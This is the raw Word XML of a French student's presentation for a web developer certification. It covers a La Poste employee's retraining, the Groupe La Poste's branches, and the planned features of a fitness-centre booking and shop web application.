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4B7A8" w14:textId="77777777" w:rsidR="001067EE" w:rsidRDefault="001067EE" w:rsidP="001067EE">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:t>Présentation du projet chef d’œuvre</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C68279" w14:textId="77777777" w:rsidR="001067EE" w:rsidRDefault="001067EE" w:rsidP="00B55D74">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Je vous présente le projet qui sert de support à l’obtention du titre de développeur web et web mobile. </w:t>
      </w:r>
      <w:r w:rsidR="00B55D74">
        <w:t>Je m’appelle Laurent Picard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> je suis pos</w:t>
      </w:r>
      <w:r w:rsidR="00B55D74">
        <w:t>tier depuis treize ans. J’ai d’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">abord été facteur 10 ans, puis pilote de production dans un centre de tri pendant trois ans et depuis octobre dernier je suis une formation pour devenir développeur informaticien. Pour cette présentation, je vous propose </w:t>
      </w:r>
      <w:r w:rsidR="00372B6D">
        <w:t xml:space="preserve">de passer en revue </w:t>
      </w:r>
      <w:r>
        <w:t>le plan suivant :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8818A5" w14:textId="77777777" w:rsidR="001067EE" w:rsidRDefault="00056AF0" w:rsidP="001067EE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r w:rsidR="00C3764D">
        <w:t>Groupe La Poste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53267717" w14:textId="77777777" w:rsidR="001067EE" w:rsidRDefault="001067EE" w:rsidP="001067EE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:t>Le contexte du stage professionnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B37EA8" w14:textId="77777777" w:rsidR="001067EE" w:rsidRDefault="001067EE" w:rsidP="001067EE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:t>La th</w:t>
      </w:r>
      <w:r w:rsidR="00C77597">
        <w:t>èm</w:t>
      </w:r>
      <w:r>
        <w:t>e du projet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520EA994" w14:textId="77777777" w:rsidR="001067EE" w:rsidRDefault="001067EE" w:rsidP="001067EE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La conception et le codage des composants </w:t>
      </w:r>
      <w:r w:rsidRPr="001067EE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>front-end</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r w:rsidRPr="001067EE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>back-end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178C7599" w14:textId="77777777" w:rsidR="001067EE" w:rsidRDefault="001067EE" w:rsidP="001067EE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:t>La présentation d’une recherche effectuée à partir d’un site anglophone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02883877" w14:textId="77777777" w:rsidR="001067EE" w:rsidRDefault="001067EE" w:rsidP="001067EE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:t>La présentation d’un jeu d’essai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEAE474" w14:textId="77777777" w:rsidR="001067EE" w:rsidRDefault="001067EE" w:rsidP="001067EE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:t>Les modalités d’usage de l’application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544B0AF6" w14:textId="77777777" w:rsidR="001067EE" w:rsidRDefault="001067EE" w:rsidP="001067EE">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:t>Une</w:t>
      </w:r>
      <w:r w:rsidR="001F508D">
        <w:t xml:space="preserve"> démonstration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de l’application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF06186" w14:textId="77777777" w:rsidR="00975FAC" w:rsidRDefault="00975FAC" w:rsidP="00975FAC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00975FAC">
        <w:t>Le Groupe La Poste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DA2991" w14:textId="77777777" w:rsidR="00321DA0" w:rsidRPr="00321DA0" w:rsidRDefault="00321DA0" w:rsidP="00321DA0">
      <w:r>
        <w:t>Compétence - oral</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7179A259" w14:textId="77777777" w:rsidR="00975FAC" w:rsidRPr="00975FAC" w:rsidRDefault="00975FAC" w:rsidP="00975FAC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:after="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Le Groupe La Poste est un groupe multi-activités dont le modèle repose sur cinq branches d’activi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>tés.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62562824" w14:textId="77777777" w:rsidR="00975FAC" w:rsidRDefault="00975FAC" w:rsidP="00975FAC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0072B5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>La branche Services-Courrier-Colis</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concentre trois activités :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4ED801" w14:textId="77777777" w:rsidR="00975FAC" w:rsidRPr="00975FAC" w:rsidRDefault="00975FAC" w:rsidP="00975FAC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="144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Le courrier, le colis et les services à domicile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C1598E" w14:textId="77777777" w:rsidR="00975FAC" w:rsidRDefault="00975FAC" w:rsidP="00975FAC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0072B5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>La Banque Postale</w:t>
      </w:r>
      <w:r w:rsidRPr="00975FAC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, une banque pour particuliers et professionnels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01958976" w14:textId="77777777" w:rsidR="00975FAC" w:rsidRDefault="00975FAC" w:rsidP="00975FAC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0072B5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GeoPost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00975FAC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, spécialisé dans le colis-express routier en Europe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C7246B" w14:textId="77777777" w:rsidR="00975FAC" w:rsidRDefault="00975FAC" w:rsidP="00975FAC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00975FAC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Le</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6C6C6C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0072B5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Réseau La Poste</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commercialise les offres et services du Groupe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CD11AF" w14:textId="77777777" w:rsidR="00975FAC" w:rsidRDefault="00975FAC" w:rsidP="00975FAC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00975FAC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>La branche</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6C6C6C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0072B5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Numérique</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qui a pour mission le développement des activités</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numériques du Groupe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202C52B3" w14:textId="77777777" w:rsidR="00975FAC" w:rsidRDefault="00975FAC" w:rsidP="00975FAC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="16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Il est à noter que le rapprochement prévu en 2020 de La Poste avec le Groupe CNP devrait déboucher sur un grand pôle financier et faire de la Banque Postale une bancassurance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6D549F" w14:textId="77777777" w:rsidR="00C3764D" w:rsidRDefault="00F8550C" w:rsidP="00F8550C">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r w:rsidR="00753690">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">choix du </w:t>
      </w:r>
      <w:r w:rsidR="002B4593">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>projet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00544F6D" w14:textId="77777777"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Avec la transformation digitale des entreprises, il existe un besoin de compétences en termes de conception et de développement d’applications informatiques. Dans le cas précis du Groupe, la transformation numérique de ses activités nécessite de disposer d’équipes de développeurs. Aussi La Poste a mis en place un dispositif permettant à ses collaborateurs d’être promus au post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">e de développeur informaticien </w:t>
      </w:r>
      <w:r w:rsidRPr="00802224">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>à l’issue d’une formation diplômante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D77BF25" w14:textId="77777777"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Cette formation se déroule de la façon suivante : La moitié de la formation est consacrée aux cours, dont</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> l’enseignement est assuré par l’organisme de formation </w:t>
      </w:r>
      <w:r w:rsidRPr="00802224">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Simplon</w:t>
      </w:r>
      <w:r w:rsidRPr="00802224">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. L’autre moitié a pour cadre le stage en entreprise au sein d’une des </w:t>
      </w:r>
      <w:r w:rsidRPr="00802224">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>DSI du Groupe</w:t>
      </w:r>
      <w:r w:rsidRPr="00802224">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, lieu de la nouvelle affectation du collaborateur. En ce qui me concerne, mon entité d’affectation est la </w:t>
      </w:r>
      <w:r w:rsidRPr="00802224">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>DSI colissimo</w:t>
      </w:r>
      <w:r w:rsidRPr="00802224">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>. Son organisation est structurée autour de plusieurs pôles dont un qui est dédié aux développements d’un référentiel de données (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802224">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ftref</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802224">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ECD146" w14:textId="77777777"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 xml:space="preserve">Comme les besoins de développement de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00802224">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ftref</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00802224">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sont axés sur le back et qu’en parallèle les règles de sécurité en matière d’accès aux applications sont restrictives, j’ai préféré opter pour un projet personnel plus en phase avec les technologies enseignées et donc plus facile pour à concevoir et à mettre en œuvre.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592542B2" w14:textId="77777777" w:rsidR="00B22D6F" w:rsidRDefault="002D2034" w:rsidP="00B22D6F">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Les fonctionnalités</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057C7F75" w14:textId="77777777" w:rsidR="00F8017C" w:rsidRPr="00F8017C" w:rsidRDefault="00F8017C" w:rsidP="00F8017C">
      <w:r>
        <w:t>Contexte - oral</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14326859" w14:textId="77777777" w:rsidR="004D1B67" w:rsidRDefault="004D1B67" w:rsidP="004D1B67">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6C6C6C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mon projet a pour thème un centre de fitness. L’application s’adresse à deux profils d’utilisateurs : les clients et le staff. Ces deux axes constituent la trame des fonctionnalités du cahier des charges :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD9E4B0" w14:textId="77777777" w:rsidR="004D1B67" w:rsidRDefault="004D1B67" w:rsidP="004D1B67">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc8551665"/>
      <w:r>
        <w:t>3.1 L’axe clientèle</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="7E272347" w14:textId="77777777" w:rsidR="00CF6F55" w:rsidRDefault="00CF6F55" w:rsidP="00CF6F55">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:t>Chaque client devra donc créer un compte utilisateur pour pouvoir accéder aux différents services proposés par le site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E815800" w14:textId="77777777" w:rsidR="004D1B67" w:rsidRDefault="00CF6F55" w:rsidP="00CF6F55">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:t>Chaque séance est une séquence de réservations d’équipements d’une durée de 10’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0319BF90"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Visualiser sous forme de feuille de route le contenu de chaque séance réservée.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD69656"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Souscrire à un abonnement afin de bénéficier des séances à moitié prix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C521C5C"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Visualiser le catalogue de la boutique en ligne et acheter des produits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7516F253"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Accéder à l’historique des commandes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5B5291" w14:textId="77777777" w:rsidR="004D1B67" w:rsidRDefault="004D1B67" w:rsidP="004D1B67">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc8551666"/>
      <w:r>
        <w:t>3.2 L’axe gérance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="267B3442" w14:textId="77777777" w:rsidR="004D1B67" w:rsidRDefault="004D1B67" w:rsidP="004D1B67">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Le staff disposera des fonctionnalités suivantes :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F908890"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La gestion des infrastructures du site (ajout et paramétrage des équipements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D3EC2E"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La gestion des offres (création de formules d’abonnements et mise en ligne d’un catalogue)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1881D1"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Une vue des revenus et dépenses de chaque équipement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0639185B"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Une synthèse glissante de l’évolution du taux de réservation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5767FDF9" w14:textId="77777777" w:rsidR="004D1B67" w:rsidRDefault="004D1B67" w:rsidP="004D1B67">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:t>La gestion des comptes utilisateurs du staff.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B872C06" w14:textId="77777777" w:rsidR="00FF07EF" w:rsidRDefault="004D1B67" w:rsidP="00FF07EF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:autoSpaceDN w:val="0"/>
